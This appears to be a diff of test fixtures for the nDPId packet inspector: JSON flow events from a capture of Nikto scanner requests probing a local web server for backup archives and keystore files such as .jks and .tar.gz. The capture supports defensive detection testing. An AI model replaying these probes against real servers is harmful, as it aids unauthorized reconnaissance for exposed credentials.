{"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277048,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1576420277048,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277048,"pkt":"AAAAAAAAAAAAAAAACABFAADBa4BAAEAG0LR\/AAABfwAAAcNwH5C2s1MRi3VVO4AYAED+tQAAAQEICp1m\/GCdZvxfR0VUIC8wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277048,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277048,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277049,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1576420277049,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277049,"pkt":"AAAAAAAAAAAAAAAACABFAADEjgBAAEAGrjF\/AAABfwAAAcNyH5D9QLWRKHRYjoAYAED+uAAAAQEICp1m\/GGdZvxhR0VUIC8xMjcuMC50YXIuZ3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277049,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277049,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277050,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1576420277050,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277050,"pkt":"AAAAAAAAAAAAAAAACABFAADEqilAAEAGkgh\/AAABfwAAAcN0H5AfdZJKMNG2kYAYAED+uAAAAQEICp1m\/GKdZvxiR0VUIC8xMjcuMC50YXIuZ3ogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277050,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277050,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277051,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1576420277051,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277051,"pkt":"AAAAAAAAAAAAAAAACABFAADFD2RAAEAGLM1\/AAABfwAAAcN2H5CQvDcOP8imdIAYAED+uQAAAQEICp1m\/GOdZvxjR0VUIC8xMjdfMF8wXzEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277051,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277051,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277054,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1576420277054,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277054,"pkt":"AAAAAAAAAAAAAAAACABFAADFMyBAAEAGCRF\/AAABfwAAAcN4H5CwJQty\/UTYeoAYAED+uQAAAQEICp1m\/GadZvxmR0VUIC8xMjdfMF8wXzEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277054,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277054,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277055,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1576420277055,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277055,"pkt":"AAAAAAAAAAAAAAAACABFAADBVOZAAEAG505\/AAABfwAAAcN6H5D0fGyVu01Ol4AYAED+tQAAAQEICp1m\/GedZvxnR0VUIC8xMjcuMC5lZ2cgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277055,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277055,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277057,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1576420277057,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277057,"pkt":"AAAAAAAAAAAAAAAACABFAADBgcdAAEAGum1\/AAABfwAAAcN8H5AHG7m2UJwwhYAYAED+tQAAAQEICp1m\/GmdZvxpR0VUIC8xMjcuMC5lZ2cgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277057,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277057,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277058,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1576420277058,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277058,"pkt":"AAAAAAAAAAAAAAAACABFAADB8E5AAEAGS+Z\/AAABfwAAAcN+H5BxG8g961ERj4AYAED+tQAAAQEICp1m\/GqdZvxqR0VUIC8xMjcuMC5qa3MgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277058,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
